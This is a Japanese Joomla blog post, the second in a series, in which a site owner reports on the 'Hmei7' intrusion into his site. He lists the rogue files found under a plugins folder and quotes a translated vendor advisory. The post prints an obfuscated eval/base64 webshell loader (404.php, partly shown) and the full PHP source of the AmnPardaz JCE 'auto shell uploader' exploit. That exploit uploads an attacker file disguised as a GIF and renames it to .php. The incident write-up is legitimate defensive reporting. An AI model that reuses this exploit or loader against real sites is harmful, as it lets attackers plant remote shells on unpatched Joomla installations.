Joomla 写風

  • フォントサイズを大きくする
  • デフォルトフォントサイズ
  • フォントサイズを小さく
Home hacked by Hmei7-その2

hacked by Hmei7-その2

Eメール 印刷 PDF

【hacked by Hmei7 緊急報告-その2】

更にログイン履歴の一覧を調べました。

アクセスLOGは7日間のログ、統計解析などを調べましたが膨大なデータのため見逃しているのか決め手になる異常は見つけだすことが出来なかった。

Thumbnail image

あきらめかけたが気を取り直しもう一度統計解析を見直しました。
問題の x.txt のほかに赤い囲いのファイルが存在していることに気づきました。見覚えのないファイルです。すぐさまサーバーにアクセスして消去しましたがこの作成日がいつだったのかを記録していなかった。

Thumbnail image

上記解析結果より3ヶ増加していました。アンダーラインのファイルが異常です。

/joomla/plugins/usr/.tool/404.php
                                       /a.php
                                       /b.php
                                       /c.php
                                       /d.php
                                       /e.php
                                       /f.php
                                       /g.php
                                      /h.php

                             /example.php
                             /example.xml
                             /index.html
                             /joomla.php
                             /joomla.xml

ファイル中身を聞き下に示します。

404.php

<? eval(gzinflate(base64_decode('7b17e9s4rjj899nnOd+B1WRH9tRxbCfpxYmdprk1bZq2ubSdNv1l
ZUm21ciWRpLjpN1+9xcAKYm62k7T2fOc98w+21gSCIIgCYAgCG51//sfm1vu0P3vfyxpk2B46Wq+zzp
M0df7j/rrT9Z6j5+uPVqFX3qrtdpvPumb/VbjkdlXNtjKynSoBUzzTHbrTJjhWOMBG2njrS1Apju24yGi3xqN
fr/RUDbgpW/q8KqJPw2zr03s4FLTA8sZw1t137JN/7U2VuHzM/hsjc2Kerp3tH/5dvvshVpjl5f7h0d7l5dV
ALD6FeYHnuv4laXL072T93snn9UXZ2dvL8/h6XL7YO/4TP1SUw8cZ2CbapU96HRYX7N9k1XZ9//+B
4P/hqZmmF6Fiq006w221lhjx07A9p3J2FCxGgQzb6wAfv4AqnzT94HaSz/QvKCCAM9Mz3O8S890HS
+A9lca9NYaW5e+GVRU/tl2Bmrt+PzoKPkRXl8SgK/WUuVG2s2leWPqE+TOZWCNzBAEPtPzpW2NrK
ASvxxpA0u//GviBKZ/6U3GCCQ+h9wELp0evjkGXqqteksNGTlIlx64eqUaM6o/GfNeAo5brm9r/hCANM/
TbitL9CcCxf88M5h4Y2alQbYY/YCq3IqaRQVUhZDtRE0hAtEfP/ifpcu3b07PYODkEUXfqrzXIupdzxoHR
87AGlcierdw/A+b3ajbN1fgCd653bOhCU35a2L6gWmw85MjNtV8NgbAPgIywBgMLZ/5pndtevXNFZd
wefivZhgejJXutqvpgOaUQBhMFpprzNSHDkuN2xdAsfplq8vewkhiTxqbKyESTummH9zaZjdmszV2Jw
H7DjPOgya1Gxs9Tb8aeEjbMs2+9m/9fn+j53gwyttN94b5jm0ZjN6GXNxckdFu6uY4ML3wqe94IzYyg6
FjdGCmBeF7XnNw65odFBdTqIGNtRF/CoFWsHR3cyWJkoua5LSCIcglA4gG9vvv7IHl4xwgBp3ieP08
MtYrueyqfqlWOTocx+bIDW6hXCzIquzf/445VmERZhwfn1WEUb8AFNRaYbwW+UsVaUqgg//F+OYiE
EZo4E3MUJiABIoRyCMSACKxFkD3TUE0MX/Sg8fK2xdvL9+c1hq1VaQAaFKm1lgJSVlyUGKr8ApFZ1
yDeD+2blQSvlrfvBw5hgkvSdAMUNBEb0kaLBmWr/Vs8zKcNH4COPOVFxo6II70qYGwAAe/KqFoSTF
cJ24Lup/pQ8PyKtI3wpaPiBojWhnNXrlm4BOKYVvTzYpycaHUmLIC/0QgofhYKgcXkD9ErfD4GUBtc1y
hT8vNL6BKmLqiRtxHfHV6JWrgI1qmV0BqtqWBCoHauZiKB4JyZPkB27U8Uw8c71ZhnS5TgDlKTYL
Zt0DqwP/NmzoKEWvM9InnwfRiCBkWYSs+W5mylV4MmsXyh+6M+9bgj/kQydAJXKdDZ8pQg1+bDG
DGJh8VHMXYDEBPBmxZG2cLgX4ao7mAwtPSzbgII92aKHDuo+zUdZBsgQQ4gddZxLozAuFkehLgt
WVOE4DbJ2/ZGQ5kDqN5LhCZgDh8y3aozRNPwyZxQMvljGArmm0rHLyanHLFXRx2csRi22fLdrJaG
wH6YAeBqgCt1oOG+KhnNHZkjScgwE0gwADRGZjQtwYH9W9BQY1CnFiQLV8n8AJmH3njuOYYSq
Gpku0j9m82gAnBli2GZJjjzKjhRVKI+zicgB0gqixOkEBNH1bYMqoJ1mfLrgnKZLmx1mg0oN1+HpoYR
e6YJJj6QhiJsMFchLXKCBvchbAyjHwg1a2xTlOwhDxUrCnwYoR/zMR0oQjIC2UmmrkaOw9W7IapZ
     :
  :

以下意味の解らない文字が続く 省略
    :
    :
>

a.php(h.php まで同じもの)

 

<?php
######################################### www.bugreport.ir ##############################
#
#                     AmnPardaz Security Research & Penetration Testing Group
#
#
# Title:                  Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version
# Vendor:                 http://www.joomlacontenteditor.net
# Vulnerable Version:     JCE 2.0.10 (prior versions also may be affected)
# Exploitation:           Remote with browser
# Original Advisory:      http://www.bugreport.ir/index_78.htm
# Vendor supplied patch:  http://www.joomlacontenteditor.net/news/item/jce-2011-released
# CVSS2 Base Score:       (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5       
# Coded By:               Mostafa Azizi
######################################################################################

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<html>
<head>
<title>JCE Joomla Extension Remote File Upload</title>
</head>

<body bgcolor="#00000">

<p align="center"><font size="4" color="#00ff00">JCE Joomla Extension Remote File Upload</font></p>
</font>
<table width="90%">
  <tbody>
    <tr>
      <td width="43%" align="left">
        <form name="form1" action="'.$SERVER[PHP_SELF].'" enctype="multipart/form-data"  method="post">
          <p></font><font color="#00ff00" > hostname (ex:www.sitename.com):    </font><input name="host"
size="20"> <span class="Stile5"><font color="#FF0000">*</span></p>
          <p></font><font color="#00ff00" > path (ex: /joomla/ or just / ):            </font><input name="path" siz
e="20"> <span class="Stile5"><font color="#FF0000">*</span></p>
          <p></font><font color="#00ff00" >Please specify a file to upload:           </font><input type="file" nam
e="datafile" size="40"><font color="#FF0000"> * </font><p><font color="#00ff00" > 
specify a port (default is 80):             </font><input name="port" size="20"><span class="Stile5"></span>
</p>
          <p><font color="#00ff00" >  Proxy (ip:port):
                                 </font><input name="proxy" size="20"><span class="Stile5"></span></p>
          <p align="center"> <span class="Stile5"><font color="#FF0000">* </font><font color="white" >fields
are required</font></font></span></p>
          <p><input type="submit" value="Start" name="Submit"></p>
        </form>
      </td>
    </tr>
  </tbody>
</table>
</body></html>';

function sendpacket($packet,$response = 0,$output = 0,$s=0)
{
    $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
    global $proxy, $host, $port, $html, $user, $pass;
    if ($proxy == '')
    {
        $ock = fsockopen($host,$port);
        stream_set_timeout($ock, 5);
        if (!$ock)
        {
            echo '<font color=white> No response from '.htmlentities($host).' ...<br></font>';
            die;
        }
    } else
    {
        $parts = explode(':',$proxy);
        echo '<font color=white>Connecting to proxy: '.$parts[0].':'.$parts[1].' ...<br><br/></font>';
        $ock   = fsockopen($parts[0],$parts[1]);
        stream_set_timeout($ock, 5);
        if (!$ock)
        {
            echo '<font color=white>No response from proxy...<br></font>';
            die;
        }
    }

        fputs($ock,$packet);
        if ($response == 1)
        {
            if ($proxy == '')
            {
                $html = '';
                while (!feof($ock))
                {
                    $html .= fgets($ock);
                }
            } else
            {
                $html = '';
                while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
                {
                    $html .= fread($ock,1);
                }
            }
        } else $html = '';

        fclose($ock);
        if ($response == 1 && $output == 1) echo nl2br(htmlentities($html));
        if ($s==1){
        $count=0;
        $res=nl2br(htmlentities($html));
        $str = array('2.0.11</title','2.0.12</title','2.0.13</title','2.0.14</title','2.0.15</title','1.5.7.10</title',
'1.5.7.11</title','1.5.7.12</title','1.5.7.13</title','1.5.7.14</title');
        foreach ($str as $value){
        $pos = strpos($res, $value);
        if ($pos === false) {
        $count=$count++;
        } else {
        echo "<font color=white>Target patched.<br/><br/></font>";
        die();
        }
        }
        if ($count=10) echo '<font color=white>Target is exploitable.<br/><br/></font>';
        }
}

  if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

                                                  /* Packet 1 --> Checking Exploitability */
            $packet  = "GET ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&
file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
            $packet .= "Host: ".$host."\r\n";
            $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";
           
            sendpacket($packet,1,0,1);
 
                                        /* Packet 2 --> Uploading shell as a gif file */
                                        
            $content = "GIF89a1\n";
            $content .= file_get_contents($_FILES['datafile']['tmp_name']);
            $data    = "-----------------------------41184676334\r\n";
            $data   .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
            $data   .= "/\r\n";
            $data   .= "-----------------------------41184676334\r\n";
            $data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
            $data   .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
            $data   .= "-----------------------------41184676334\r\n";
            $data   .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
            $data   .= "0\r\n";
            $data   .= "-----------------------------41184676334\r\n";
            $data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"kur.gif\"\r\n";
            $data   .= "Content-Type: image/gif\r\n\r\n";
            $data   .= "$content\r\n";
            $data   .= "-----------------------------41184676334\r\n";
            $data   .= "kur\r\n";
            $data   .= "-----------------------------41184676334\r\n";
            $data   .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
            $data   .= "upload\r\n";
            $data   .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";
            $packet  = "POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&
file=imgmanager&method=form&cid=20&
6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";
            $packet .= "Host: ".$host."\r\n";
            $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
            $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184
676334\r\n";
            $packet .= "Accept-Language: en-us,en;q=0.5\r\n";
            $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
            $packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a5
64e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.
1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz
=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
            $packet .= "Connection: Close\r\n";
            $packet .= "Proxy-Connection: close\r\n";
            $packet .= "Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n";
            $packet .= $data;
           
            sendpacket($packet,0,0,0);
           
                                          /* Packet 3 --> Change Extension from .gif to .php */
                                       
                                       
            $packet  = "POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&
file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
            $packet .= "Host: ".$host."\r\n";
            $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n";
            $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
            $packet .= "Accept-Language: en-US,en;q=0.8\r\n";
            $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
            $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
            $packet .= "Accept-Encoding: deflate\n";
            $packet .= "X-Request: JSON\r\n";
            $packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3;
__utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=
216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F;
6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";
            $ren ="json={\"fn\":\"folderRename\",\"args\":[\"/kur.gif\",\"kur.php\"]}";
            $packet .= "Content-Length: ".strlen($ren)."\r\n\r\n";
            $packet .= $ren."\r\n\r\n";
           
            sendpacket($packet,1,0,0);

  {echo "Exploit Faild...";} else echo  "<font color=white>Exploit Succeeded...<br>
http://$host:$port$path"

."/images/stories/kur.php</font>";
}
?>

 

このファイルをクリックすると次のような表示がされます。

Thumbnail image

 

いずれも上記の見慣れないファイルは削除しています。なお、これらのファイルはスキャンしても引っかかりませんでした。

また、このファイルの使用を Net で「JCE Joomla Extension Remote File Upload 」のワードで検索したところ翻訳文で以下のようなことが分かりました。

 

リリース日

Jan 25, 2013 2013年1月25日

Severity重症度

high高い

Impact衝撃

System Compromise: Remote attackers can execute arbitrary script code in the context of the affected site.システムが侵害される:リモートの攻撃者は影響を受けるサイトのコンテキストで任意のスクリプトコードを実行することができます。

Description説明

This indicates an attack attempt to exploit multiple vulnerabilities in JCE Joomla!これは、JCEのJoomlaの複数の脆弱性を悪用する攻撃の試みを示している! extension.拡張子。

This issue is caused by a lack of sanitizing the user input that is passed to "index.php".この問題で "index.php"に渡され消毒ユーザー入力の不足によって引き起こされる。 It may allow remote attackers to execute arbitrary script via a crafted http request.これは、リモートの攻撃者が細工したHTTPリクエストを介して任意のスクリプトを実行できる可能性があります。

Affected Products影響を受ける製品

Versions lower than JCE 2.0.11 or JCE 1.5.7.14 JCEの2.0.11またはJCE 1.5.7.14よりも低いバージョン
http://www.joomlacontenteditor.net/news/item/jce-2011-released http://www.joomlacontenteditor.net/news/item/jce-2011-released

Coverageカバレッジ

IPS IPS
VCM VCM

Reference/sリファレンス/秒

http://www.joomla.org/ http://www.joomla.org/

 

最終更新 2013年 10月 22日(火曜日) 23:37  
Home hacked by Hmei7-その2

写風お勧め Extemtion

秋づいた美山町

  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow
  • An Image Slideshow

Movies

アンケート

Joomla!を何に利用しますか?
 

オンライン中のユーザー

現在
 ゲスト 68 人
 がオンラインです

ニュース速報

昨日アメリカのすべてのサーバーがもっと多くのRAMと良いCPUを要求するためのストライキで、機能しなくなりました。スポークスマンは良いRAMのニーズは、バカ者によりいくつかのフロントサイドバス速度を増加している。将来バスはマザーボードの中でスローダウンするようにいわれるであろう。